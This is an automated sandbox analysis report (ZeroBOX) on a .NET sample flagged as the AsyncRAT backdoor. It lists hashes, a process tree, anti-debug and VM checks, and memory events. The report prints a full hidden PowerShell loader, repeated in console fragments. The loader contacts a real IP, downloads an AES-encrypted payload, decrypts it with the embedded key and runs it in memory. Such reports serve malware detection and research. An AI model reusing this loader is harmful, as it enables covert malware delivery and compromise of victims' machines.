Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	April 28, 2023, 5:07 p.m.	April 28, 2023, 5:13 p.m.

Size	236.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`9f9583b07cf9622b9db6299ca6157012`
SHA256	`8bad05c9f2e4195e80bd90d02d6a08a398b8d93a475b6eb3ef950f4d1380f73c`
CRC32	`CFF2DABB`
ssdeep	`3072:6NI/Wm20P4bTAI6c3BGQBEhXPmYoI/0O/K4/DMzAwpcq0BYvZ79R9VsCsruA+u14:Rumj4bP6/bCuQkMcq3BZRHfsaA+u1IOq`
Yara	Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

originalbuild.exe "C:\Users\test22\AppData\Local\Temp\originalbuild.exe"
2644
- powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -65536;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('NjExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheols.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.GetStream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 300000; $keuperSheols = [System.Text.StringBuilder]::new(); $keuperSheols.AppendLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMourner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASCII.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vulgareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dispose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetString($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encoding]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbarGutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Convert]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbarGutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $crowbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgare.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulgare.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO.MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStream; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgare, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitosGutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Reflection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outwarsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulgare = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMucuna = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mournerSheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe'))); #($mournerSheols, $mournerSheols);
  2744

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
91.215.85.198	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 28, 2023, 5:07 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 28, 2023, 5:07 p.m.			0	0
IsDebuggerPresent April 28, 2023, 5:07 p.m.			0	0
IsDebuggerPresent April 28, 2023, 5:07 p.m.			0	0
IsDebuggerPresent April 28, 2023, 5:07 p.m.			0	0

Command line console output was observed (50 out of 728 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Method invocation failed because [System.Text.StringBuilder] doesn't contain a console_handle: 0x00000023	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: method named 'new'. console_handle: 0x0000002f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: At line:1 char:683 console_handle: 0x0000003b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: + if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553 console_handle: 0x00000047	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: 6;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::Fr console_handle: 0x00000053	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: omBase64String('OTEuMjE1Ljg1LjE5OA==')); $gutteMucuna = [System.Text.Encoding]: console_handle: 0x0000005f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: :UTF8.GetString([System.Convert]::FromBase64String('NTc2OTE=')); $keuperOutwars console_handle: 0x0000006b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('N console_handle: 0x00000077	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: jExYjg=')); $gutteSheols = new-object System.Net.Sockets.TcpClient; $gutteSheol console_handle: 0x00000083	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: s.Connect($gutteMourner, [int]$gutteMucuna); $vulgareMourner = $gutteSheols.Get console_handle: 0x0000008f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Stream(); $gutteSheols.SendTimeout = 300000; $gutteSheols.ReceiveTimeout = 3000 console_handle: 0x0000009b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: 00; $keuperSheols = [System.Text.StringBuilder]::new <<<< (); $keuperSheols.App console_handle: 0x000000a7	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: endLine('GET /' + $keuperOutwars); $keuperSheols.AppendLine('Host: ' + $gutteMo console_handle: 0x000000b3	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: urner); $keuperSheols.AppendLine(); $outwarsGutte = [System.Text.Encoding]::ASC console_handle: 0x000000bf	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: II.GetBytes($keuperSheols.ToString()); $vulgareMourner.Write($outwarsGutte, 0, console_handle: 0x000000cb	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: $outwarsGutte.Length); $mucunaThymoma = New-Object System.IO.MemoryStream; $vul console_handle: 0x000000d7	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: gareMourner.CopyTo($mucunaThymoma); $vulgareMourner.Dispose(); $gutteSheols.Dis console_handle: 0x000000e3	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: pose(); $mucunaThymoma.Position = 0; $keuperAnitos = $mucunaThymoma.ToArray(); console_handle: 0x000000ef	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: $mucunaThymoma.Dispose(); $vulgareSheols = [System.Text.Encoding]::ASCII.GetStr console_handle: 0x000000fb	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ing($keuperAnitos).IndexOf('`r`n`r`n')+1; $mournerVulgare = [System.Text.Encodi console_handle: 0x00000107	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ng]::ASCII.GetString($keuperAnitos[$vulgareSheols..($keuperAnitos.Length-1)]); console_handle: 0x00000113	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: $mournerVulgare = [System.Convert]::FromBase64String($mournerVulgare); $crowbar console_handle: 0x0000011f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Gutte = New-Object System.Security.Cryptography.AesManaged; $crowbarGutte.Mode console_handle: 0x0000012b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: = [System.Security.Cryptography.CipherMode]::CBC; $crowbarGutte.Padding = [Syst console_handle: 0x00000137	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: em.Security.Cryptography.PaddingMode]::PKCS7; $crowbarGutte.Key = [System.Conve console_handle: 0x00000143	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: rt]::FromBase64String('lomtSWepOi9ANHaGs04n/oyLQvoNMdWa/8UbRPmoKMM='); $crowbar console_handle: 0x0000014f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Gutte.IV = [System.Convert]::FromBase64String('lVFjky2XnqEcCoN0oL6U8A=='); $cro console_handle: 0x0000015b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: wbarVulgare = $crowbarGutte.CreateDecryptor(); $mournerVulgare = $crowbarVulgar console_handle: 0x00000167	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: e.TransformFinalBlock($mournerVulgare, 0, $mournerVulgare.Length); $crowbarVulg console_handle: 0x00000173	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: are.Dispose(); $crowbarGutte.Dispose(); $thymomaVulgare = New-Object System.IO. console_handle: 0x0000017f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: MemoryStream(, $mournerVulgare); $anitosGutte = New-Object System.IO.MemoryStre console_handle: 0x0000018b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: am; $thymomaKeuper = New-Object System.IO.Compression.GZipStream($thymomaVulgar console_handle: 0x00000197	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: e, [IO.Compression.CompressionMode]::Decompress); $thymomaKeuper.CopyTo($anitos console_handle: 0x000001a3	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Gutte); $mournerVulgare = $anitosGutte.ToArray(); $mournerAnitos = [System.Refl console_handle: 0x000001af	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ection.Assembly]::Load($mournerVulgare); $sheolsMucuna = [System.Text.Encoding] console_handle: 0x000001bb	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ::UTF8.GetString([System.Convert]::FromBase64String('Zm9yZmFyZUt1cnU=')); $outw console_handle: 0x000001c7	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: arsAnitos = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64 console_handle: 0x000001d3	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: String('dnVsZ2FyZVRoeW1vbWE=')); $crowbarOutwars = [System.Text.Encoding]::UTF8 console_handle: 0x000001df	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: .GetString([System.Convert]::FromBase64String('bXVjdW5hU2hlb2xz')); $keuperVulg console_handle: 0x000001eb	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: are = $mournerAnitos.GetType($sheolsMucuna + '.' + $outwarsAnitos); $vulgareMuc console_handle: 0x000001f7	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: una = $keuperVulgare.GetMethod($crowbarOutwars); $vulgareMucuna.Invoke($mourner console_handle: 0x00000203	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: Sheols, (, [string[]] ('C:\Users\test22\AppData\Local\Temp\originalbuild.exe')) console_handle: 0x0000020f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ); #($mournerSheols, $mournerSheols); console_handle: 0x0000021b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: + CategoryInfo : InvalidOperation: (new:String) [], RuntimeExcept console_handle: 0x00000227	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: ion console_handle: 0x00000233	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: + FullyQualifiedErrorId : MethodNotFound console_handle: 0x0000023f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000025f	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: At line:1 char:711 console_handle: 0x0000026b	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: + if ([System.Environment]::GetEnvironmentVariables().Count -lt 10) {exit -6553 console_handle: 0x00000277	1	1
WriteConsoleW April 28, 2023, 5:07 p.m.	buffer: 6;} $gutteMourner = [System.Text.Encoding]::UTF8.GetString([System.Convert]::Fr console_handle: 0x00000283	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369600 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003690c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003690c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003690c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369980 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369a80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369200 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369e80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey April 28, 2023, 5:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00369680 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx April 28, 2023, 5:07 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 184 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x008f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x727a2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00dc0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00f30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00415000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0041b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00417000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00406000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0040a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00407000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00641000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73282000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 1638400 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 28, 2023, 5:07 p.m.	process_identifier: 2744 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
